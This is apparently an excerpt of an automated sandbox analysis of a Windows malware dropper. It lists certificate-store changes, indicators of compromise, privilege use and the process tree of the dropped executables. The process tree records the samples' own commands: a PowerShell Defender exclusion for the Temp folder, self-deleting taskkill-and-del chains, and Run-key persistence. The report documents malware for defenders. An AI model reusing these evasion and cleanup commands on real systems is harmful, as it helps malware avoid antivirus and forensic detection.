dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun150d896340a863.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	PublicDwlBrowser1100.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	3238.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	3238.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	3238.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun150faeb3537d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun150d896340a863.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	PublicDwlBrowser1100.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	53	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1408	Sun15223697c98.exe
1408	Sun15223697c98.exe
584	powershell.exe
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
772	Sun150d896340a863.exe
772	Sun150d896340a863.exe
772	Sun150d896340a863.exe
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

pid	Process
1296	Process not Found
2516	WerFault.exe
2012	WerFault.exe
2580	WerFault.exe
316	WerFault.exe
2600	WerFault.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1408	Sun15223697c98.exe
336	ishsbjf
1564	ishsbjf

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2424	8641602.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	2180	Sun150faeb3537d.exe
Token: SeAssignPrimaryTokenPrivilege	2180	Sun150faeb3537d.exe
Token: SeLockMemoryPrivilege	2180	Sun150faeb3537d.exe
Token: SeIncreaseQuotaPrivilege	2180	Sun150faeb3537d.exe
Token: SeMachineAccountPrivilege	2180	Sun150faeb3537d.exe
Token: SeTcbPrivilege	2180	Sun150faeb3537d.exe
Token: SeSecurityPrivilege	2180	Sun150faeb3537d.exe
Token: SeTakeOwnershipPrivilege	2180	Sun150faeb3537d.exe
Token: SeLoadDriverPrivilege	2180	Sun150faeb3537d.exe
Token: SeSystemProfilePrivilege	2180	Sun150faeb3537d.exe
Token: SeSystemtimePrivilege	2180	Sun150faeb3537d.exe
Token: SeProfSingleProcessPrivilege	2180	Sun150faeb3537d.exe
Token: SeIncBasePriorityPrivilege	2180	Sun150faeb3537d.exe
Token: SeCreatePagefilePrivilege	2180	Sun150faeb3537d.exe
Token: SeCreatePermanentPrivilege	2180	Sun150faeb3537d.exe
Token: SeBackupPrivilege	2180	Sun150faeb3537d.exe
Token: SeRestorePrivilege	2180	Sun150faeb3537d.exe
Token: SeShutdownPrivilege	2180	Sun150faeb3537d.exe
Token: SeDebugPrivilege	2180	Sun150faeb3537d.exe
Token: SeAuditPrivilege	2180	Sun150faeb3537d.exe
Token: SeSystemEnvironmentPrivilege	2180	Sun150faeb3537d.exe
Token: SeChangeNotifyPrivilege	2180	Sun150faeb3537d.exe
Token: SeRemoteShutdownPrivilege	2180	Sun150faeb3537d.exe
Token: SeUndockPrivilege	2180	Sun150faeb3537d.exe
Token: SeSyncAgentPrivilege	2180	Sun150faeb3537d.exe
Token: SeEnableDelegationPrivilege	2180	Sun150faeb3537d.exe
Token: SeManageVolumePrivilege	2180	Sun150faeb3537d.exe
Token: SeImpersonatePrivilege	2180	Sun150faeb3537d.exe
Token: SeCreateGlobalPrivilege	2180	Sun150faeb3537d.exe
Token: 31	2180	Sun150faeb3537d.exe
Token: 32	2180	Sun150faeb3537d.exe
Token: 33	2180	Sun150faeb3537d.exe
Token: 34	2180	Sun150faeb3537d.exe
Token: 35	2180	Sun150faeb3537d.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	1732	Sun157ff8e4440aa.exe
Token: SeDebugPrivilege	1524	Sun1584240df9fe73a3.exe
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	2076	2.exe
Token: SeDebugPrivilege	2760	853943.exe
Token: SeDebugPrivilege	3052	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeDebugPrivilege	1716	8.exe
Token: SeDebugPrivilege	752	6850068.exe
Token: SeDebugPrivilege	2724	8670989.exe
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	2512	6321092.exe
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeDebugPrivilege	3008	Chrome 5.exe
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found
Token: SeShutdownPrivilege	1296	Process not Found

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found
2108	setup_2.tmp
1296	Process not Found
1296	Process not Found

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1296	Process not Found
1296	Process not Found
1296	Process not Found
1296	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1656 wrote to memory of 1640	1656	setup_x86_x64_install.exe	30
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1640 wrote to memory of 1788	1640	setup_installer.exe	31
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 440	1788	setup_install.exe	33
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1552	1788	setup_install.exe	34
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 1016	1788	setup_install.exe	52
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 316	1788	setup_install.exe	35
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 692	1788	setup_install.exe	51
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 1056	1788	setup_install.exe	50
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1788 wrote to memory of 808	1788	setup_install.exe	49
PID 1016 wrote to memory of 1872	1016	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Users\Admin\AppData\Local\Temp\7zS8663E374\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8663E374\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe
      4⤵
      Loads dropped DLL
      PID:1552
    - - C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun152260a303c33a7.exe
        
        Sun152260a303c33a7.exe
        5⤵
        Executes dropped EXE
        
        PID:1464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150d896340a863.exe
      4⤵
      Loads dropped DLL
      PID:316
    - - C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun150d896340a863.exe
        
        Sun150d896340a863.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:772
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun150d896340a863.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun150d896340a863.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:2480
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun150d896340a863.exe /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2264
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:1116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone
      4⤵
      Loads dropped DLL
      PID:940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe
      4⤵
      Loads dropped DLL
      PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe
      4⤵
      Loads dropped DLL
      PID:1820
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe
      4⤵
      Loads dropped DLL
      PID:808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15223697c98.exe
      4⤵
      Loads dropped DLL
      PID:1056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe
      4⤵
      Loads dropped DLL
      PID:692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1016

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun15223697c98.exe
Sun15223697c98.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1408

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun15b61bf18b0f1.exe
Sun15b61bf18b0f1.exe
1⤵
- Executes dropped EXE
PID:608

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun1584240df9fe73a3.exe
Sun1584240df9fe73a3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524
- C:\ProgramData\853943.exe
  "C:\ProgramData\853943.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2760
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2760 -s 1728
    3⤵
    - Program crash
    - Suspicious behavior: GetForegroundWindowSpam
    PID:2580
- C:\ProgramData\8734150.exe
  "C:\ProgramData\8734150.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  PID:2824
- - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2960
- C:\ProgramData\6850068.exe
  "C:\ProgramData\6850068.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 1692
    3⤵
    - Program crash
    - Suspicious behavior: GetForegroundWindowSpam
    PID:2600

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun157a449716c8ee483.exe
Sun157a449716c8ee483.exe /mixone
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun157a449716c8ee483.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun157a449716c8ee483.exe" & exit
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "Sun157a449716c8ee483.exe" /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2924

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun157ff8e4440aa.exe
Sun157ff8e4440aa.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1732
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
